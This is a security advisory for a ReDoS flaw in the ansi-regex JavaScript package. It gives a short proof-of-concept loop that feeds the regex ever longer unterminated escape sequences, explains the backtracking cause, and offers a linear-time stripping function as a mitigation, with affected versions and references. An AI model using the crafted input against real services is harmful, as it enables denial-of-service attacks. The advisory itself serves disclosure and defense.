ansi-regex is vulnerable to Inefficient Regular Expression Complexity (ReDoS): the regular expression it builds backtracks super-linearly on malformed ANSI escape codes, so an attacker who controls the parsed string can cause a denial of service.
Proof of Concept
```js
import ansiRegex from 'ansi-regex';

// Each iteration builds a truncated CSI sequence ("ESC [" followed by a run of
// semicolons) that is 10,000 characters longer than the previous one, then
// times how long the regex takes to reject it.
for (var i = 1; i <= 50000; i++) {
	var time = Date.now();
	var attack_str = "\u001B[" + ";".repeat(i * 10000);
	ansiRegex().test(attack_str);
	var time_cost = Date.now() - time;
	console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
```
The ReDoS is mainly due to the sub-patterns `[[\\]()#;?]*` and `(?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*`. Both can consume a run of `;` characters, so when the remainder of the pattern fails to match (as it does for the truncated input above, which never reaches the expected terminator), the engine retries every way of splitting that run between the two sub-patterns, and matching time grows super-linearly with the number of semicolons.
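A mitigation that avoids the backtracking entirely is to parse escape sequences with a single forward scan instead of a regex with nested quantifiers. The following is an added example, not code from ansi-regex or its maintainers: a linear-time ANSI stripper that recognises CSI sequences (ESC [ or the single-byte 0x9B introducer, parameter/intermediate bytes, then a final byte), OSC sequences (ESC ] ... terminated by BEL or ESC \), and two-character escapes. The byte ranges follow ECMA-48; the function names and the sample inputs are constructed for this example. An unterminated sequence such as the one built by the proof of concept is consumed once and never re-scanned, so the cost stays O(n).

```javascript
// Added example (not ansi-regex's own code): strip ANSI escape sequences with
// one forward scan so that malformed input cannot trigger regex backtracking.

const ESC = 0x1b;  // \u001B, 7-bit escape introducer
const CSI8 = 0x9b; // \u009B, single-byte CSI introducer
const BEL = 0x07;  // \u0007, OSC terminator

// CSI final bytes are 0x40-0x7E per ECMA-48 (e.g. 'm', 'H', 'J').
function isCsiFinal(code) {
  return code >= 0x40 && code <= 0x7e;
}

// CSI parameter bytes (0x30-0x3F, includes digits and ';') and intermediate
// bytes (0x20-0x2F) may appear between the introducer and the final byte.
function isCsiParamOrIntermediate(code) {
  return code >= 0x20 && code <= 0x3f;
}

// Returns `input` with escape sequences removed. Each character is visited at
// most once; an unterminated sequence is dropped up to the first byte that
// cannot belong to it (or to the end of input), with no rescanning.
function stripAnsi(input) {
  let out = '';
  let i = 0;
  const n = input.length;
  while (i < n) {
    const c = input.charCodeAt(i);
    if (c !== ESC && c !== CSI8) {
      out += input[i];
      i++;
      continue;
    }
    let j = i + 1;
    const isCsi = c === CSI8 || (j < n && input[j] === '[');
    const isOsc = c === ESC && j < n && input[j] === ']';
    if (isCsi) {
      if (c === ESC) j++; // skip '['
      while (j < n && isCsiParamOrIntermediate(input.charCodeAt(j))) j++;
      if (j < n && isCsiFinal(input.charCodeAt(j))) j++;
      // Otherwise the sequence is malformed: resume at the offending byte.
      i = j;
    } else if (isOsc) {
      j++; // skip ']'
      while (j < n) {
        const d = input.charCodeAt(j);
        if (d === BEL) { j++; break; }
        if (d === ESC && j + 1 < n && input[j + 1] === '\\') { j += 2; break; }
        j++;
      }
      i = j;
    } else {
      // Two-character escape (e.g. ESC c) or a lone ESC at end of input.
      i = Math.min(j + 1, n);
    }
  }
  return out;
}

// Constructed inputs for a stand-alone run (node this_file.js). The last one
// mirrors the shape of the proof-of-concept input: an unterminated CSI with a
// long run of semicolons, which this scanner rejects in a single pass.
function selfCheck() {
  return {
    colored: stripAnsi('\u001B[31mred\u001B[0m text'),
    osc: stripAnsi('\u001B]0;title\u0007body'),
    eightBit: stripAnsi('\u009B1mx'),
    unterminated: stripAnsi('\u001B[' + ';'.repeat(200000)),
    plain: stripAnsi('no escapes here'),
  };
}

console.log(selfCheck());
```

The scanner is deliberately stricter than the library's regex: it does not try to validate every sequence variant, only to find its end in one pass, which is what a defender needs when untrusted text flows through log or terminal output handling.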
CPE | Name | Operator | Version
---|---|---|---
 | ansi-regex | ge | 3.0.0
 | ansi-regex | lt | 3.0.1
 | ansi-regex | ge | 4.0.0
 | ansi-regex | lt | 4.1.1
 | ansi-regex | ge | 5.0.0
 | ansi-regex | lt | 5.0.1
 | ansi-regex | ge | 6.0.0
 | ansi-regex | lt | 6.0.1
References
app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908
github.com/chalk/ansi-regex
github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1
github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a
github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9
github.com/chalk/ansi-regex/commit/c3c0b3f2736b9c01feec0fef33980c43720dcde8
github.com/chalk/ansi-regex/issues/38#issuecomment-924086311
github.com/chalk/ansi-regex/issues/38#issuecomment-925924774
github.com/chalk/ansi-regex/releases/tag/v6.0.1
huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994
nvd.nist.gov/vuln/detail/CVE-2021-3807
security.netapp.com/advisory/ntap-20221014-0002
www.oracle.com/security-alerts/cpuapr2022.html